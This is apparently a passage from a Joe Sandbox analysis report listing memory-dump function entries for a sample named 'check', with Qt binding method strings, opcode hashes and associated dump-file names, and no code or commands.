                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?elementCount@FromLongLong_PainterPath@@
                                                                                                                                                                                                                                          • String ID: QPainterPath$elementCount$elementCount(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3704173227-770691564
                                                                                                                                                                                                                                          • Opcode ID: 5e8eae33e957adeda2e6c44f5f5415e34df2f5c71493ce04467cc77140303649
                                                                                                                                                                                                                                          • Instruction ID: cff82d6f10b330883d5337aa2ad7e0f43d9217386937e4f2c1737d401aaee83b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8eae33e957adeda2e6c44f5f5415e34df2f5c71493ce04467cc77140303649
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77011A77E08A46D2EB10DF60E8496A933A4FB44F94F914032C99E43320EF7DE959C344
                                                                                                                                                                                                                                          Function 00007FF89D99A050 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?wheelFromHints@@Lines@LongLong_ScrollStyle
                                                                                                                                                                                                                                          • String ID: QStyleHints$wheelScrollLines$wheelScrollLines(self) -> int
                                                                                                                                                                                                                                          • API String ID: 219075363-4050251624
                                                                                                                                                                                                                                          • Opcode ID: 23b404e9987d58d32b766f6d394d485e891b9fedb3f7271c7071170fc0716ef8
                                                                                                                                                                                                                                          • Instruction ID: 495baf57f56bca873edec03aa48bb60b1cee2a0cfa30c685317c0bb9f20917ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23b404e9987d58d32b766f6d394d485e891b9fedb3f7271c7071170fc0716ef8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD011A76A09A46D1EB109F60E8496A933A4FB44F94F914032C98E43324EF7DE559C384
                                                                                                                                                                                                                                          Function 00007FF89D9AC050 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromItem@@LongStandardTristate@
                                                                                                                                                                                                                                          • String ID: QStandardItem$isTristate$isTristate(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 383762042-2587352797
                                                                                                                                                                                                                                          • Opcode ID: 090265bdb6405654f7bb5478f7fea592fdda225e52baa382c8aaa92c28b8b587
                                                                                                                                                                                                                                          • Instruction ID: 0f8815a8fba88e7452624280975af066305be39098ec25b2d31b329e9961d620
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 090265bdb6405654f7bb5478f7fea592fdda225e52baa382c8aaa92c28b8b587
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB01DA36E08A46D2EB10DF61E8496A933A4FB44BD5F914032D99E47320EF7DE569C344
                                                                                                                                                                                                                                          Function 00007FF89D984050 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Style@$?capFromLongLong_Pen@@Qt@@
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$stencilBufferSize$stencilBufferSize(self) -> int
                                                                                                                                                                                                                                          • API String ID: 2449751085-761713505
                                                                                                                                                                                                                                          • Opcode ID: 76651a812a8bd82d2f650f36542cf5ff6d50c44134464f6f38c3ff41dee4b672
                                                                                                                                                                                                                                          • Instruction ID: 48999dff499662e4c325a67f0a282eb9811f00924896e706ca361fdb35980eec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76651a812a8bd82d2f650f36542cf5ff6d50c44134464f6f38c3ff41dee4b672
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37011A76A08A46C1EB109F61E8496A933A4FB84FD4F914032C99E47324EF7DE559C384
                                                                                                                                                                                                                                          Function 00007FF89D965F80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?depth@FromLongLong_Screen@@
                                                                                                                                                                                                                                          • String ID: QScreen$depth$depth(self) -> int
                                                                                                                                                                                                                                          • API String ID: 1346572956-3054028960
                                                                                                                                                                                                                                          • Opcode ID: 04d14bb8e25050dd9b0e952e75c2a41e3e2f1cab813fa43b7d8b5e77acc5005e
                                                                                                                                                                                                                                          • Instruction ID: b5848646ad7b094915508a40e915a48c10c498b2ec75c20e4e749e694bdc7838
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04d14bb8e25050dd9b0e952e75c2a41e3e2f1cab813fa43b7d8b5e77acc5005e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E012C36A08B46C1EB109F60E8496A933A4FB44FD4F918032DA9E43324EF7DF559C344
                                                                                                                                                                                                                                          Function 00007FF89D999FC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLongNull@Vector2
                                                                                                                                                                                                                                          • String ID: QVector2D$isNull$isNull(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 6648286-38585300
                                                                                                                                                                                                                                          • Opcode ID: 3a87ccc9c40517c9e8a98463d79f45e325e8440336d5a99c6b4ab22a86f3967a
                                                                                                                                                                                                                                          • Instruction ID: 6fa9ff75878170ce1bb77eeeb30615d5b023c2bf8d529fb78d24efd0e71816b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a87ccc9c40517c9e8a98463d79f45e325e8440336d5a99c6b4ab22a86f3967a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61011E76A08A46C1DB109F51E8496A933E4FB44F94F914072CA9E43320EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D9B1FC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?firstFrame@@FromLongLong_Position@Text
                                                                                                                                                                                                                                          • String ID: QTextFrame$firstPosition$firstPosition(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3956399597-3694259807
                                                                                                                                                                                                                                          • Opcode ID: 2e587a2c7a73fef8e37bd71da686ffdebd02d2954c24a8d4ea80f5866df22037
                                                                                                                                                                                                                                          • Instruction ID: 57e93409ef0b32a741a3fbc768dd0dc90444d5ee69d2e364b54bbb5e6afcb06c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e587a2c7a73fef8e37bd71da686ffdebd02d2954c24a8d4ea80f5866df22037
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1012C76A08A46D1EB109F60E8496A933A8FB84FD0F914032C99E43320EF7DF65AC344
                                                                                                                                                                                                                                          Function 00007FF89D93BFD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?senderFromIndex@LongLong_Object@@Signal
                                                                                                                                                                                                                                          • String ID: QTextBlockGroup$senderSignalIndex$senderSignalIndex(self) -> int
                                                                                                                                                                                                                                          • API String ID: 2462028585-2797169557
                                                                                                                                                                                                                                          • Opcode ID: 9b1017e88e2f7bf60a12d420ebb58c044ab039b29ec9eeee62dd0f7e5aa838a6
                                                                                                                                                                                                                                          • Instruction ID: 781d9250fbb36e329db306d995208cfcbc9f345d9a3a74a31a00909612870ed8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b1017e88e2f7bf60a12d420ebb58c044ab039b29ec9eeee62dd0f7e5aa838a6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7011A76A08A46C1EB109F61E8496A933A4FB84F95F914032DA9E47320EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D961F30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
